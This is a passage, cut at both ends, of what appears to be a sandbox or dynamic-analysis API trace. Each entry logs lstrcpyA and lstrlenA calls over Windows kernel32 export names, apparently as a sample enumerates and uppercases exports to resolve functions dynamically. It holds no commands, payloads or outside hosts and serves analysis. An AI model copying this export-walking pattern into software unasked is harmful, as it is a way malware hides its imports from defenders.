returned="ConvertDefaultLocale" [0077.194] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.194] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.194] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.194] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.194] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.194] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.194] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.194] lstrlenA (lpString="COPYFILEA") returned 9 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.194] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.194] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.194] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.194] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.195] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.195] lstrlenA (lpString="COPYFILEW") returned 9 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.195] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.195] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.195] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.195] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.195] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.195] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.195] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.195] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.195] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.195] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.195] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.195] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.195] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.195] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.195] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.195] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.195] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.195] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.196] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.196] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.196] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.196] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.196] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.196] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.196] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.196] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.196] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.196] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.196] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.196] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.196] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.196] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.196] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.196] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.196] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.196] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.197] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.197] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.197] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.197] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.197] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.197] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.197] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.197] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.197] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.197] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.197] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.197] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.197] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.197] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.197] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.197] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.197] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.197] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.197] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.198] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.198] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.198] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.198] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.198] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.198] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.198] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.198] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.198] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.198] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.198] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.198] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.198] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.198] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.198] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.198] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.198] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.198] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.199] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.199] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.199] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.199] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.199] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.199] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.199] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.199] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.199] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.199] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.199] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.199] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.199] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.199] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.199] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.199] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.199] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.199] lstrlenA (lpString="DELETEATOM") returned 10 [0077.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.199] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.200] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.200] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.200] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.200] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.200] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.200] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.200] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.200] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.200] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.200] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.200] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.200] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.200] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.200] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.200] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.200] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.200] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.200] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.201] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.201] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.201] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.201] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.201] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.201] 